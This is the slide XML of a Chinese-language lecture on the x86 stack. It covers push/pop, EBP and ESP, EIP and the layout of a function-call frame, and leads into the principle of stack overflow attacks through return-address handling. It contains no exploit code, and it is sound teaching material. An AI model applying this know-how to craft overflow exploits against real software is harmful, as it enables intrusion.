          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5508625" y="2941638"/>
            <a:ext cx="2090738" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>栈底</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>EBP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31754" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1835150" y="1428750"/>
            <a:ext cx="1439863" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内存低端</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31755" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1836738" y="2941638"/>
            <a:ext cx="1439862" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内存高端</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31756" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="357188" y="4090988"/>
            <a:ext cx="8388350" cy="1816100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>压栈（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
              <a:t>push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>）时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
              <a:t>esp=esp-4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>、</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>出栈（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
              <a:t>pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>）时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
              <a:t>esp=esp+4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>相对固定不变，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>及偏移</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>量访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>栈中数据如，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
              <a:t>ebp-8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31757" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2555875" y="2005013"/>
            <a:ext cx="863600" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>int i</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="直接箭头连接符 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="713581" y="2428082"/>
            <a:ext cx="12858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rot="5400000" flipH="1" flipV="1">
            <a:off x="6822282" y="2464594"/>
            <a:ext cx="13573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9" descr="http://enjoy.eastday.com/eastday/mil/node62186/node62675/node69517/images/0035011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62800" y="327025"/>
            <a:ext cx="1450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835150" y="5871097"/>
            <a:ext cx="5327650" cy="95410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800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>堆栈：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FILO</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>队列：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FIFO</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1">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4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>程序执行：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>PC(EIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>寄存器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>指针指引程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>执行，执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一条</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>代码后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>执行下一条代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>EIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>跳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>转进入函数代码执行，函数返回后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>返回主调函数继续执行</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145410" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>函数调用时堆栈状况</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4702170" y="3356992"/>
            <a:ext cx="4084639" cy="3121025"/>
            <a:chOff x="1688" y="1253"/>
            <a:chExt cx="2573" cy="1966"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36868"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a:t>局部变量</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36869"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a:t>堆栈基址</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36870"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a:t>函数返回地址</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36871"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ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
                <a:t>函数参数</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36872" name="Text Box 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3470" y="1570"/>
              <a:ext cx="764" cy="291"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN">
                  <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                </a:rPr>
                <a:t></a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US"/>
                <a:t>栈顶</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36873" name="Text Box 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3470" y="2822"/>
              <a:ext cx="791" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN">
                  <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                </a:rPr>
                <a:t></a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US"/>
                <a:t>栈底</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36874" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1688" y="1570"/>
              <a:ext cx="502" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
                <a:t>低端</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36875" name="Text Box 11"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1689" y="2523"/>
              <a:ext cx="502" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
                <a:t>高端</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36876" name="Line 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2245" y="1253"/>
              <a:ext cx="0" cy="1905"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36877" name="Line 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3379" y="1253"/>
              <a:ext cx="0" cy="1905"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36878" name="Text Box 14"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2245" y="2931"/>
              <a:ext cx="1134" cy="288"/>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36879" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2245" y="1253"/>
              <a:ext cx="1134" cy="288"/>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36880" name="Line 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2011" y="1842"/>
              <a:ext cx="0" cy="681"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="57150">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36881" name="Line 17"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3878" y="2114"/>
              <a:ext cx="0" cy="590"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="57150">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="747522" name="Picture 2" descr="http://www.hztarena.org/Upfiles/Article/20133149484656.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-32" y="3374092"/>
            <a:ext cx="4613107" cy="3000396"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="圆角矩形标注 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5004048" y="6021288"/>
            <a:ext cx="1857388" cy="571504"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -6064"/>
              <a:gd name="adj2" fmla="val -207582"/>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smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>攻击瞄准器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">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22"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="747522"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7475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6A1A76DD-83F5-47DB-9B88-5D54EAD265D5}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270338" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>栈溢出攻击的原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270339" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>当调用函数时</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>Call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>指令会将返回地址（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>Call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>指令下一条指令地址）压入栈</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>Ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>指令会把压栈的返回地址弹给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>EIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>（指令寄存器）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>栈溢出攻击的原理</a:t>
            </a:r>
